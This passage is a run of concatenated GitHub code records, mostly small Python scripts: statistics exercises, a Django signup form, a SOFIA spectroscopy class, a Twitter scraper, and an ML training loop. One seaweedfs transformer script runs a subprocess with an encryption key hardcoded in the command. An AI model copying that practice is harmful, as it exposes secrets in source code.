Dubai.\"\n params = DocumentParameters()\n params[\"content\"] = relationships_text_data\n try:\n return api.relationships(params)\n except RosetteException as exception:\n print(exception)\n\n\nPARSER = argparse.ArgumentParser(formatter_class=argparse.ArgumentDefaultsHelpFormatter,\n description='Calls the ' +\n os.path.splitext(os.path.basename(__file__))[0] + ' endpoint')\nPARSER.add_argument('-k', '--key', help='Rosette API Key', required=True)\nPARSER.add_argument('-u', '--url', help=\"Alternative API URL\",\n default='https://api.rosette.com/rest/v1/')\n\nif __name__ == '__main__':\n ARGS = PARSER.parse_args()\n RESULT = run(ARGS.key, ARGS.url)\n print(RESULT)\n","repo_name":"rosette-api/python","sub_path":"examples/relationships.py","file_name":"relationships.py","file_ext":"py","file_size_in_byte":1774,"program_lang":"python","lang":"en","doc_type":"code","stars":38,"dataset":"github-code","pt":"71"} +{"seq_id":"33590682973","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Jul 23 08:34:37 2022\n\n@author: xj9\n\"\"\"\n\nimport math\nimport matplotlib.pyplot as plt\n\ndef sum3(N = 100):\n N_totals = []\n total = 0\n for n in range(1,N+1):\n total += ((-1)**(n+1))/n\n \n N_totals.append(total)\n print(N_totals)\n plt.plot(range(n),N_totals)\n plt.show()\n \n","repo_name":"MDgaddis/Math300_Gaddis","sub_path":"Python/hw3_2.py","file_name":"hw3_2.py","file_ext":"py","file_size_in_byte":378,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"6139095782","text":"pA, pG, rA, rG = input().split()\npA = float(pA)\npG = float(pG)\nrA = float(rA)\nrG = float(rG)\n\nalcool = rA/pA\ngasolina = rG/pG\n\nif alcool > gasolina:\n print('A')\nelse:\n print('G')\n \n","repo_name":"henrique2020/URI","sub_path":"Python/2295.py","file_name":"2295.py","file_ext":"py","file_size_in_byte":190,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"71"} +{"seq_id":"7825443144","text":"\"\"\"\nGiven an integer array nums, return true if any value appears at least twice in the array, and return false if every element is distinct.\n\n\n\"\"\"\nnums = list(map(int,input().split()))\nnew_num = set(nums)\nnew_num_len = len(new_num)\nnum_len = len(nums)\nif new_num_len == num_len:\n print(False)\nelse:\n print(True)","repo_name":"kiritka-jain/Leet_Code_Practice_Questions","sub_path":"Arrays/Random_Questions_easy/Day_1/contain_duplicate.py","file_name":"contain_duplicate.py","file_ext":"py","file_size_in_byte":318,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"8226379582","text":"#Desarrollar una función que recibe una lista y el elemento a buscar,\n#devolviendo su posición si existe y -1 en caso de que no.\n\nlista = [1,2,\"Hola\",5.6]\n\ndef buscar_lista(lista, valor):\n\ti = 0\n\ttry:\n\t\twhile True:\n\t\t\tif lista[i] == valor:\n\t\t\t\tindice = i\n\t\t\t\tbreak\n\t\t\ti += 1\n\texcept IndexError:\n\t\tindice = -1\n\tfinally:\n\t\treturn indice\n\ndef buscar_lista_2(lista, valor):\n\ttry:\n\t\tindice = lista.index(valor)\n\texcept ValueError:\n\t\tindice = -1\n\tfinally:\n\t\treturn indice\n\nprint(buscar_lista(lista,1))\nprint(buscar_lista(lista,10))\n\nprint(buscar_lista_2(lista,2))\nprint(buscar_lista_2(lista,10))\n","repo_name":"Informatorio2020/informatorio2020","sub_path":"Nelgusgom/Listaexisteono.py","file_name":"Listaexisteono.py","file_ext":"py","file_size_in_byte":592,"program_lang":"python","lang":"es","doc_type":"code","stars":2,"dataset":"github-code","pt":"71"} +{"seq_id":"86284824528","text":"# Licensed under a 3-clause BSD style license - see LICENSE.rst\n\nfrom astropy import units, constants\nimport numpy as np\n\nfrom sofia_redux.scan.info.base import InfoBase\nfrom sofia_redux.scan.utilities.utils import (\n to_header_float, insert_info_in_header)\n\n__all__ = ['SofiaSpectroscopyInfo']\n\n\nclass SofiaSpectroscopyInfo(InfoBase):\n\n velocity_unit = units.Unit('km') / units.Unit('s')\n\n def __init__(self):\n \"\"\"\n Initialize the SOFIA spectroscopy information.\n\n Contains information on SOFIA spectroscopic parameters such as the\n bandwidth, resolution, frequencies, and velocities.\n \"\"\"\n super().__init__()\n self.front_end = None\n self.back_end = None\n self.bandwidth = np.nan * units.Unit('MHz')\n self.frequency_resolution = np.nan * units.Unit('MHz')\n self.tsys = np.nan * units.Unit('Kelvin')\n self.observing_frequency = np.nan * units.Unit('MHz')\n self.image_frequency = np.nan * units.Unit('MHz')\n self.rest_frequency = np.nan * units.Unit('MHz')\n self.velocity_type = None\n self.frame_velocity = np.nan * self.velocity_unit\n self.source_velocity = np.nan * self.velocity_unit\n\n @property\n def log_id(self):\n \"\"\"\n Return the string log ID for the info.\n\n The log ID is used to extract certain information from table data.\n\n Returns\n -------\n str\n \"\"\"\n return 'spec'\n\n def apply_configuration(self):\n \"\"\"\n Update spectroscopic information with FITS header information.\n\n Updates the information by taking the following keywords from the\n FITS header::\n\n FRONTEND - The frontend device name (str)\n BACKEND - The backend device name (str)\n BANDWID - The total spectral bandwidth (MHz)\n FREQRES - The spectral frequency resolution (MHz)\n TSYS - The system temperature (K)\n OBSFREQ - The observing frequency at the reference channel (MHz)\n IMAGFREQ - The image frequency at the reference channel (MHz)\n RESTFREQ - The rest frequency at the reference channel (MHz)\n VELDEF - The velocity system definition (str)\n VFRAME - Radial velocity of the reference frame wrt observer (km/s)\n RVSYS - The source velocity wrt the observer (km/s)\n\n Returns\n -------\n None\n \"\"\"\n options = self.options\n if options is None:\n return\n mhz = units.Unit('MHz')\n self.front_end = options.get_string('FRONTEND')\n self.back_end = options.get_string('BACKEND')\n self.bandwidth = options.get_float('BANDWID') * mhz\n self.frequency_resolution = options.get_float('FREQRES') * mhz\n self.tsys = options.get_float('TSYS') * units.Unit('Kelvin')\n self.observing_frequency = options.get_float('OBSFREQ') * mhz\n self.image_frequency = options.get_float('IMAGFREQ') * mhz\n self.rest_frequency = options.get_float('RESTFREQ') * mhz\n self.velocity_type = options.get_string('VELDEF')\n self.frame_velocity = options.get_float('VFRAME') * self.velocity_unit\n self.source_velocity = options.get_float('RVSYS') * self.velocity_unit\n\n def get_redshift(self):\n \"\"\"\n Return the redshift of the source determined from it's velocity.\n\n The redshift is calculated as::\n\n z = sqrt( (1 + v/c) / (1 - v/c) ) - 1\n\n where v is the source velocity and c is the speed of light. I.e., the\n relativistic doppler shift along the line of sight.\n\n Returns\n -------\n redshift : float\n \"\"\"\n v_over_c = (self.source_velocity / constants.c).decompose().value\n return np.sqrt((1.0 + v_over_c) / (1.0 - v_over_c)) - 1.0\n\n def edit_header(self, header):\n \"\"\"\n Edit an image header with available information.\n\n Parameters\n ----------\n header : astropy.fits.Header\n The FITS header to apply.\n\n Returns\n -------\n None\n \"\"\"\n info = [\n ('COMMENT', \"<------ SOFIA Spectroscopy Data ------>\"),\n ('FRONTEND', self.front_end, 'Frontend device name.'),\n ('BACKEND', self.back_end, 'Backend device name.'),\n ('BANDWID', to_header_float(self.bandwidth, 'MHz'),\n '(MHz) Total spectral bandwidth.'),\n ('FREQRES', to_header_float(self.frequency_resolution, 'MHz'),\n '(MHz) Spectral frequency resolution.'),\n ('TSYS', to_header_float(self.tsys, 'K'),\n '(K) System temperature.'),\n ('OBSFREQ', to_header_float(self.observing_frequency, 'MHz'),\n '(MHz) Observing frequency at reference channel.'),\n ('IMAGFREQ', to_header_float(self.image_frequency, 'MHz'),\n '(MHz) Image frequency at reference channel.'),\n ('RESTFREQ', to_header_float(self.rest_frequency, 'MHz'),\n '(MHz) Rest frequency at reference channel.'),\n ('VELDEF', self.velocity_type, 'Velocity system definition.'),\n ('VFRAME', to_header_float(self.frame_velocity, 'km/s'),\n '(km/s) Radial velocity of reference frame wrt observer.'),\n ('RVSYS', to_header_float(self.source_velocity, 'km/s'),\n '(km/s) Source radial velocity wrt observer.')\n ]\n insert_info_in_header(header, info, delete_special=True)\n\n def get_table_entry(self, name):\n \"\"\"\n Return a parameter value for the given name.\n\n Parameters\n ----------\n name : str\n The name of the parameter to retrieve.\n\n Returns\n -------\n value\n \"\"\"\n if name == 'bw':\n return self.bandwidth.to('GHz')\n if name == 'df':\n return self.frequency_resolution.to('MHz')\n elif name == 'tsys':\n return self.tsys.to('Kelvin')\n elif name == 'fobs':\n return self.observing_frequency.to('GHz')\n elif name == 'frest':\n return self.rest_frequency.to('GHz')\n elif name == 'vsys':\n return self.velocity_type\n elif name == 'vframe':\n return self.frame_velocity.to('km/s')\n elif name == 'vrad':\n return self.source_velocity.to('km/s')\n elif name == 'z':\n return self.get_redshift()\n else:\n return super().get_table_entry(name)\n","repo_name":"SOFIA-USRA/sofia_redux","sub_path":"sofia_redux/scan/custom/sofia/info/spectroscopy.py","file_name":"spectroscopy.py","file_ext":"py","file_size_in_byte":6471,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"71"} +{"seq_id":"34942480603","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# Week 2:\n# Basic statistical functions for data exploration\n# 1. Measures of central tendency – mean, median, mode\n# 2. Measures of data spread\n# 3. Dispersion of data – variance, standard deviation\n# 4. Position of the different data values – quartiles, inter-quartile range (IQR).\n\n# In[1]:\n\n\n#to calculate mean\nfrom collections import Counter\nnumb = [2, 3, 5, 7, 8,2,2,3,4,5,2]\nno = len(numb)\nsumm = sum(numb)\nmean = summ / no\nprint(\"The mean or average of all these numbers (\", numb, \") is\", str(mean))\n\n# to calculate median\nno = len(numb)\nnumb.sort()\nif no % 2 == 0:\n median1 = numb[no//2]\n median2 = numb[no//2 - 1]\n median = (median1 + median2)/2\nelse:\n median = numb[no//2]\nprint(\"The median of the given numbers (\", numb, \") is\", str(median))\n\n# to calulate mode\nno = len(numb)\nval = Counter(numb)\nfindMode = dict(val)\nmode = [i for i, v in findMode.items() if v == max(list(val.values()))] \nif len(mode) == no:\n findMode = \"The group of number do not have any mode\"\nelse:\n findMode = \"The mode of a number is / are: \" + ', '.join(map(str, mode))\nprint(findMode)\n\n\n# In[2]:\n\n\n#quartile and interquartile\n\ndata = sorted(list(map(int,input(\"Input numbers with space > \").split())))\nn = len(data)\ni = n // 2\n\nif n % 2 == 0:\n\tmedian = (data[i-1] + data[i])/2\n\tq3i = 0\nelse:\n\tmedian = data[i]\n\tq3i = 0\n\nnquartile = n // 2\ni = nquartile // 2\n\nif nquartile % 2 == 0:\n\tq1 = (data[i-1] + data[i])/2\n\tq3 = (data[q3i + nquartile + i - 1] + data[q3i + nquartile + i]) / 2\nelse:\n\tq1 = data[i]\n\tq3 = data[q3i + nquartile + i]\n\nprint(data)\nprint(\"Q1 =\", q1)\nprint(\"Q2 =\", median, \"(median)\")\nprint(\"Q3 =\", q3)\nprint(\"Interquartile =\", q3 - q1)\n\n\n# In[9]:\n\n\n\n#standard deviation\n\nfrom math import sqrt\nn= [11, 8, 8, 3, 4, 4, 5, 6, 6, 7, 8] \nmean =sum(n)/len(n)\nSUM= 0\nfor i in n :\n SUM +=(i-mean)**2\nstdeV = sqrt(SUM/(len(n)-1)) \nprint(stdeV)\n\n\n# In[10]:\n\n\n#variance\n#define a function, to calculate variance\ndef variance(X):\n mean = sum(X)/len(X)\n tot = 0.0\n for x in X:\n tot = tot + (x - mean)**2\n return tot/len(X)\n \n# call the function with data set\nx = [1, 2, 3, 4, 5, 6, 7, 8, 9] \nprint(\"variance is: \", variance(x))\n \ny = [1, 2, 3, -4, -5, -6, -7, -8] \nprint(\"variance is: \", variance(y))\n \nz = [10, -20, 30, -40, 50, -60, 70, -80] \nprint(\"variance is: \", variance(z))\n\n\n# In[2]:\n\n\nimport pandas as pd\nimport numpy as np\nimport statistics as st \n\n# Load the data\ndf = pd.read_csv(\"C:/Users/saile/Desktop/week2.csv\")\nprint(df.shape)\n\n\n# In[3]:\n\n\ndf.mean()\n\n\n# In[4]:\n\n\ndf.std()\n\n\n# In[5]:\n\n\ndf.var()\n\n\n# In[6]:\n\n\nfrom scipy.stats import iqr\n\n\n# \n","repo_name":"siddu808/c","sub_path":"iot_week2(without libraries).py","file_name":"iot_week2(without libraries).py","file_ext":"py","file_size_in_byte":2635,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"72621951591","text":"# -*- coding: utf-8 -*-\nimport argparse\nimport glob\nimport os\nimport ntpath\nimport shutil\nimport subprocess\nimport sys\nfrom collections import defaultdict\n\n\nif __name__ == \"__main__\":\n argparser = argparse.ArgumentParser()\n argparser.add_argument(\"--src\", type=str, dest=\"src\",\n help=\"directory to store volume data files, the .idx and .dat files should already exist inside the dir.\")\n argparser.add_argument(\"--dst\", type=str, dest=\"dst\",\n help=\"directory to store encrypted volume data files.\")\n args = argparser.parse_args()\n src_dir = args.src\n dst_dir = args.dst\n\n if src_dir != \"\" and dst_dir != \"\":\n if not os.path.isfile(\"./transformer\"):\n print(\"please provide transformer execution binary\")\n sys.exit(-1)\n if not os.access(\"./transformer\", os.X_OK):\n print(\"please set execution permission for transformer\")\n sys.exit(-1)\n\n if not os.path.isdir(dst_dir):\n # 新目录不存在则为之创建一个\n os.makedirs(dst_dir)\n\n # 获取所有的collection-vid关系对\n src_dat_files = glob.glob(os.path.join(src_dir, \"*.dat\"))\n src_dat_files.sort()\n collection_vid_map = defaultdict(list)\n for dat_file in src_dat_files:\n filename = ntpath.basename(dat_file)\n filename_without_suffix = os.path.splitext(filename)[0]\n parts = filename_without_suffix.split(\"_\")\n collection, vid = \"_\".join(parts[:len(parts)-1]), parts[len(parts)-1]\n collection_vid_map[collection].append(vid)\n\n for collection, vids in collection_vid_map.items():\n for vid in vids:\n print(\"/-------------------- {}_{}.dat command --------------------/\".format(collection, vid))\n commands = [\n \"env ENCRYPTION_KEY=TEpSZVlpTURwRENuS0JkNXBGZzQzUT09 ./transformer\",\n \"-verbose=true\",\n \"-collection={}\".format(collection),\n \"-vid={}\".format(vid),\n \"-src={}\".format(src_dir),\n \"-dst={}\".format(dst_dir),\n ]\n print(\" \".join(commands))\n print(\"/-------------------- {}_{}.dat result --------------------/\".format(collection, vid))\n pipe_output = subprocess.check_output(\" \".join(commands), shell=True)\n print(pipe_output.decode(\"utf-8\"))\n\n src_idx_file = os.path.join(src_dir, \"{}_{}.idx\".format(collection, vid))\n src_dat_file = os.path.join(src_dir, \"{}_{}.dat\".format(collection, vid))\n dst_idx_file = os.path.join(dst_dir, \"{}_{}.idx\".format(collection, vid))\n dst_dat_file = os.path.join(dst_dir, \"{}_{}.dat\".format(collection, vid))\n # 用新索引文件替换旧索引文件\n shutil.move(dst_idx_file, src_idx_file)\n # 用新数据文件替换旧数据文件\n shutil.move(dst_dat_file, src_dat_file)\n \n # 删除临时目录\n os.rmdir(dst_dir)\n","repo_name":"amazingchow/seaweedfs-tools","sub_path":"transformer.py","file_name":"transformer.py","file_ext":"py","file_size_in_byte":3104,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"43615567750","text":"import modules.texture_analysis as t\nimport utils as u\nimport modules.semitone as semitone\n\nIMAGES_RESOURCE = \"images/resource/7_task/\"\nIMAGES_RESULT = \"images/result/7_task/\"\n\n\ndef save_to_txt(dis_i, dis_j, path):\n file = open(path, \"a\")\n file.truncate(0)\n file.write(\"dis_i=\" + str(dis_i) + \"\\n\")\n file.write(\"dis_j=\" + str(dis_j) + \"\\n\")\n file.close()\n\n\n@u.timeit\ndef texture(sample_path, result_path):\n pix = u.picture_to_array(IMAGES_RESOURCE + sample_path)\n pix_semitone = semitone.semitone(pix)\n u.array_to_picture(pix_semitone, IMAGES_RESULT + result_path + \"semitone.png\")\n\n co_occurrence_matrix = t.get_co_occurrence_matrix(pix_semitone)\n spread_image = t.norm_matrix(co_occurrence_matrix)\n\n dis_i = t.dispersion(spread_image, 0)\n dis_j = t.dispersion(spread_image, 1)\n save_to_txt(dis_i, dis_j, IMAGES_RESULT + result_path + \"features.txt\")\n\n u.array_to_picture(spread_image, IMAGES_RESULT + result_path + \"visualized.png\")\n\n\ntexture(\"water.jpg\", \"water/\")\ntexture(\"grass.jpg\", \"grass/\")\ntexture(\"metal.jpg\", \"metal/\")\ntexture(\"rust.jpg\", \"rust/\")\ntexture(\"soil.jpg\", \"soil/\")\ntexture(\"tree.jpeg\", \"tree/\")\n","repo_name":"betLomo/cv","sub_path":"task7.py","file_name":"task7.py","file_ext":"py","file_size_in_byte":1160,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"22669086513","text":"from django import forms\nfrom django.contrib.auth import get_user_model\nfrom django.contrib.auth.forms import UserCreationForm, UserChangeForm\nfrom django.db import transaction\nfrom django.utils.translation import ugettext as _\nfrom allauth.account.forms import LoginForm\nfrom allauth.account.forms import SignupForm as BaseSignupForm\nfrom users.models import Host\n\nUser = get_user_model()\n\n\nclass CustomUserCreationForm(UserCreationForm):\n class Meta(UserCreationForm):\n model = User\n fields = ('email', 'first_name', 'last_name',)\n\n\nclass CustomUserChangeForm(UserChangeForm):\n class Meta:\n model = User\n fields = ('email', 'first_name', 'last_name',)\n\n\nclass SignupForm(BaseSignupForm):\n first_name = forms.CharField(\n max_length=30,\n widget=forms.TextInput(attrs={'placeholder': 'First Name'})\n )\n last_name = forms.CharField(\n max_length=30,\n widget=forms.TextInput(attrs={'placeholder': 'Last Name'})\n )\n is_host = forms.BooleanField(\n required=False,\n label=_('Create a Host Profile?')\n )\n\n @transaction.atomic\n def save(self, request):\n \"\"\"\n If the 'Create Host Profile' checked, it will create a host profile object.\n It is important that transaction is atomic, since we are saving multiple\n different objects at once.\n \"\"\"\n user = super().save(request)\n is_host = self.cleaned_data['is_host']\n user.first_name = self.cleaned_data['first_name']\n user.last_name = self.cleaned_data['last_name']\n if is_host:\n host = Host.objects.create(user=user)\n host.save()\n return user\n\n# Overriding Django Allauth LoginForm to compat with Django Axes\n# https://django-axes.readthedocs.io/en/latest/usage.html#integration-with-django-allauth\nclass LoginForm(LoginForm):\n def user_credentials(self):\n credentials = super().user_credentials()\n credentials['login'] = credentials.get('email') or credentials.get('username')\n return credentials\n\n\nclass HostUpdateForm(forms.ModelForm):\n class Meta:\n model = Host\n exclude = ('user', 'slug', )\n","repo_name":"nollidnosnhoj/travel2change","sub_path":"travel2change/users/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":2179,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"31676922725","text":"import os\nimport time\n\nfrom utils.params import set_params\nfrom utils.helper import set_random_seed, AverageMeter\nfrom utils.keeper import Keeper\nfrom utils.loss import *\nfrom models import build_model\nfrom dataload import data_loader\n\n\ndef main(args):\n model = build_model(args.model_name)\n optimizer = torch.optim.Adam(model.parameters(), args.lr, weight_decay=args.weight_decay)\n # scheduler = torch.optim.lr_scheduler.StepLR(optimizer, step_size=100, gamma=0.5)\n\n log.info('LOSS FORMAT: SEMANTIC_LOSS MEAN_IOU PIX_ACC | DEPTH_LOSS ABS_ERR REL_ERR'\n ' | NORMAL_LOSS MEAN MED <11.25 <22.5 <30\\n')\n\n log.info('loading data...\\n')\n train_loader, val_loader = data_loader(args)\n train_bts, val_bts = len(train_loader), len(val_loader)\n log.info('train batch number: {0}; validation batch number: {1}'.format(train_bts, val_bts))\n\n # Whether using checkpoint\n if args.resume is not None:\n if not os.path.exists(args.resume):\n raise RuntimeError(\"=> no checkpoint found\")\n checkpoint = torch.load(args.resume)\n model.load_state_dict(checkpoint['state_dict'])\n\n optimizer.load_state_dict(checkpoint['optimizer'])\n chk_loss = checkpoint['chk_loss']\n best_loss = checkpoint['best_loss']\n args.start_epoch = checkpoint['epoch'] + 1\n else:\n best_loss = np.inf\n\n # whether using pretrained model\n if args.pretrained_net is not None and args.resume is None:\n pretrained_w = torch.load(args.pretrained_net)\n model_dict = model.state_dict()\n pretrained_dict = {k: torch.from_numpy(v) for k, v in pretrained_w.items() if k in model_dict}\n model_dict.update(pretrained_dict)\n model.load_state_dict(model_dict)\n\n model = model.cuda() if args.use_cuda else model\n\n # -------------------- training -------------------- #\n alpha_weight = np.ones([3, args.epochs])\n T = args.temp\n for epoch in range(args.epochs):\n e_time = time.time()\n log.info('training: epoch {}/{} \\n'.format(epoch+1, args.epochs))\n\n model.train()\n cost = np.zeros(26, dtype=np.float32)\n avg_cost = np.zeros(26, dtype=np.float32)\n\n # apply Dynamic Weight Average\n if args.weight == 'dwa':\n if epoch == 0 or epoch == 1:\n alpha_weight[:, epoch] = 1.0\n else:\n w_1 = avg_cost[epoch - 1, 0] / avg_cost[epoch - 2, 0]\n w_2 = avg_cost[epoch - 1, 3] / avg_cost[epoch - 2, 3]\n w_3 = avg_cost[epoch - 1, 6] / avg_cost[epoch - 2, 6]\n alpha_weight[0, epoch] = 3 * np.exp(w_1 / T) / (np.exp(w_1 / T) + np.exp(w_2 / T) + np.exp(w_3 / T))\n alpha_weight[1, epoch] = 3 * np.exp(w_2 / T) / (np.exp(w_1 / T) + np.exp(w_2 / T) + np.exp(w_3 / T))\n alpha_weight[2, epoch] = 3 * np.exp(w_3 / T) / (np.exp(w_1 / T) + np.exp(w_2 / T) + np.exp(w_3 / T))\n\n for k, (train_image, train_label, train_depth, train_normal) in enumerate(train_loader):\n train_label = train_label.type(torch.LongTensor)\n if args.use_cuda:\n train_image, train_label, train_depth, train_normal = \\\n train_image.cuda(), train_label.cuda(), train_depth.cuda(), train_normal.cuda()\n\n optimizer.zero_grad()\n\n train_preds, logsigma = model(train_image)\n\n train_losses = get_loss(train_preds, (train_label, train_depth, train_normal))\n\n if args.weight == 'equal' or args.weight == 'dwa':\n train_loss = torch.mean(sum(alpha_weight[i, epoch] * train_losses[i] for i in range(3)))\n else:\n train_loss = sum(1 / (2 * torch.exp(logsigma[i])) * train_losses[i] + logsigma[i] / 2 for i in range(3))\n\n train_loss.backward()\n optimizer.step()\n\n log.info('train loss of batch/epoch {}/{} is {}'.format(epoch, k, train_loss))\n\n cost[0] = train_losses[0].item()\n cost[1] = get_miou(train_preds[0], train_label, class_num=args.class_num).item()\n cost[2] = get_iou(train_preds[0], train_label).item()\n cost[3] = train_losses[1].item()\n cost[4], cost[5] = depth_error(train_preds[1], train_depth)\n cost[6] = train_losses[2].item()\n cost[7], cost[8], cost[9], cost[10], cost[11] = normal_error(train_preds[2], train_normal)\n cost[12] = train_loss\n avg_cost[:13] += cost[:13] / train_bts\n\n # evaluating test data\n model.eval()\n with torch.no_grad():\n for k, (val_image, val_label, val_depth, val_normal) in enumerate(val_loader):\n val_label = val_label.type(torch.LongTensor)\n if args.use_cuda:\n val_image, val_label, val_depth, val_normal = \\\n val_image.cuda(), val_label.cuda(), val_depth.cuda(), val_normal.cuda()\n\n val_preds, val_logsigma = model(val_image)\n val_losses = get_mtan_loss(val_preds, (val_label, val_depth, val_normal))\n\n if args.weight == 'equal' or args.weight == 'dwa':\n val_loss = torch.mean(sum(alpha_weight[i, epoch] * val_losses[i] for i in range(3)))\n else:\n val_loss = sum(\n 1 / (2 * torch.exp(val_logsigma[i])) * val_losses[i] + val_logsigma[i] / 2 for i in range(3))\n\n cost[13] = val_losses[0].item()\n cost[14] = get_miou(val_preds[0], val_label, args.class_num).item()\n cost[15] = get_iou(val_preds[0], val_label).item()\n cost[16] = val_losses[1].item()\n cost[17], cost[18] = depth_error(val_preds[1], val_depth)\n cost[19] = val_losses[2].item()\n cost[20], cost[21], cost[22], cost[23], cost[24] = normal_error(val_preds[2], val_normal)\n cost[25] = val_loss\n\n avg_cost[13:] += cost[13:] / val_bts\n\n print(\n 'Epoch: {:04d} | TRAIN: {:.4f} {:.4f} {:.4f} | {:.4f} {:.4f} {:.4f} | {:.4f} {:.4f} {:.4f} {:.4f} {:.4f} {:.4f}'\n 'TEST: {:.4f} {:.4f} {:.4f} | {:.4f} {:.4f} {:.4f} | {:.4f} {:.4f} {:.4f} {:.4f} {:.4f} {:.4f} '\n .format(epoch, *avg_cost[epoch, :]))\n keeper.save_loss(avg_cost.cpu().numpy(), 'losses.csv')\n\n if avg_cost[-1] < best_loss:\n best_loss = avg_cost[-1]\n keeper.save_checkpoint({\n 'epoch': epoch,\n 'state_dict': model.state_dict(),\n 'optimizer': optimizer.state_dict(),\n 'best_loss': best_loss,\n }, 'best_model.pth')\n\n keeper.save_checkpoint({\n 'epoch': epoch,\n 'state_dict': model.state_dict(),\n 'optimizer': optimizer.state_dict(),\n 'chk_loss': avg_cost[12],\n 'best_loss': best_loss,\n })\n\n log.info('training time of epoch {}/{} is {} \\n'.format(epoch + 1, args.epochs, time.time() - e_time))\n\n\nif __name__ == '__main__':\n set_random_seed()\n args = set_params()\n\n keeper = Keeper(args)\n log = keeper.setup_logger()\n log.info('Welcome to summoner\\'s rift')\n\n os.environ['CUDA_VISIBLE_DEVICES'] = ','.join(str(e) for e in args.gpu_ids)\n args.use_cuda = torch.cuda.is_available()\n\n keeper.save_experiment_config()\n\n start_time = time.time()\n\n log.info(\"Thirty seconds until minion spawn!\")\n\n main(args)\n\n log.info('Victory! Total game time is: {}'.format(time.time()-start_time))\n\n","repo_name":"daniallin/Reconstruction","sub_path":"train_mtan.py","file_name":"train_mtan.py","file_ext":"py","file_size_in_byte":7541,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"71"} +{"seq_id":"73822513828","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Oct 9 20:06:23 2020\n\n@author: marccastillo\n\"\"\"\n\nimport os\nimport tweepy\n# import GetOldTweets3 as got # doesn't work right now\nimport pandas as pd\nfrom datetime import datetime\n\nconsumer_key = os.environ.get(\"CONSUMER_KEY\")\nconsumer_secret = os.environ.get(\"CONSUMER_SECRET\")\naccess_token = os.environ.get(\"ACCESS_TOKEN\")\naccess_secret = os.environ.get(\"ACCESS_SECRET\")\n\nauth = tweepy.OAuthHandler(consumer_key, consumer_secret)\nauth.set_access_token(access_token, access_secret)\napi = tweepy.API(auth, wait_on_rate_limit=True, wait_on_rate_limit_notify=True)\n\n\"\"\"\n# SCRATCH WORK; IGNORE THIS\n# query = \"Tesla OR Elon\"\n# tweets = tweepy.Cursor(api.search, q=query,\n# tweet_mode=\"extended\",\n# date_since = \"2020-09-01\",\n# lang=\"en\").items()\n\n# def tweet_text(tweet):\n# if hasattr(tweet, \"retweeted_status\"):\n# return tweet.retweeted_status.full_text\n# return tweet.full_text\n\n# data = [[tweet.id_str,\n# tweet.created_at,\n# tweet.favorite_count,\n# tweet.retweet_count,\n# tweet.user.screen_name, \n# tweet.user.followers_count,\n# tweet.source,\n# tweet_text(tweet)] for tweet in tweets]\n\n# columns = [\"id\",\n# \"date_time\",\n# \"likes\", \n# \"retweets\", \n# \"user\", \n# \"user_followers\",\n# \"source\",\n# \"body\"]\n\n# tweet_df = pd.DataFrame(data=data, columns=columns)\n# pd.to_datetime(tweet_df[\"date_time\"]).describe()\n\n\"\"\"\n\n# below constructs list of urls to tweets satistfying query; requires snscrape\n# takes a long time to run so comment out after running once\n# cmd = \"snscrape twitter-search \\\"#Tesla since:2020-01-01 until:2020-10-31\\\" > tesla.txt\"\n# os.system(cmd)\n\n# after tesla.txt is constructed:\ntweet_url = pd.read_csv(\"tesla.txt\", index_col=None, header=None, names=[\"links\"])\naf = lambda x: x[\"links\"].split(\"/\")[-1]\ntweet_url[\"id\"] = tweet_url.apply(af, axis=1)\n\nids = tweet_url[\"id\"].tolist()\n\n# this function from:\n# https://medium.com/@jcldinco/downloading-historical-tweets-using-tweet-ids-via-snscrape-and-tweepy-5f4ecbf19032\n# but also modified it a little so that the column names weren't made each time\ndef fetch_tw(ids):\n import os\n list_of_tw_status = api.statuses_lookup(ids, tweet_mode= \"extended\")\n empty_data = pd.DataFrame()\n for status in list_of_tw_status:\n tweet_elem = {\"id\": status.id,\n \"user\": status.user.screen_name,\n \"text\":status.full_text,\n \"date_time\":status.created_at}\n empty_data = empty_data.append(tweet_elem, ignore_index = True)\n file_name = \"tesla_tweets.csv\"\n if not os.path.isfile(file_name):\n empty_data.to_csv(file_name)\n else: \n empty_data.to_csv(file_name, mode=\"a\", header=False)\n \n \n# process 50 entries at a time, bc original author couldn't loop through literally everything\n\ntotal_count = len(ids)\nchunks = (total_count - 1) // 50 + 1\n\nfor i in range(chunks):\n batch = ids[i*50:(i+1)*50]\n result = fetch_tw(batch)\n \n \ntext = pd.read_csv(\"tesla_tweets.csv\")\n\n\n# test4 = test.drop_duplicates()\n# len(test[test[\"date_time\"]==\"date_time\"])\n# test2 = test.drop(test[test[\"date_time\"]==\"date_time\"].index)\n# test.nunique()\n# test3 = test2.drop_duplicates()\n# sampleid = test2[\"id\"][1]\n# test2[test2[\"id\"]==sampleid]\n","repo_name":"castillo-marc/NLP_Twitter","sub_path":"pull_tweets.py","file_name":"pull_tweets.py","file_ext":"py","file_size_in_byte":3500,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"71"} +{"seq_id":"3763145213","text":"from __future__ import absolute_import\nfrom __future__ import print_function\nfrom __future__ import division\n\nimport numpy as np\nnp.random.seed(67)\n\nimport tensorflow as tf\n\nfrom tqdm import trange\n\ndef main():\n X = tf.constant([[0, 0], [0, 1], [1, 0], [1, 1]], dtype=tf.float32)\n y = tf.constant([[0, 1, 1, 0]], dtype=tf.float32)\n\n weights0 = tf.Variable(np.random.normal(size=(2, 4)), dtype=tf.float32)\n weights1 = tf.Variable(np.random.normal(size=(4, 1)), dtype=tf.float32)\n\n activations0 = tf.sigmoid(tf.matmul(X, weights0))\n activations1 = 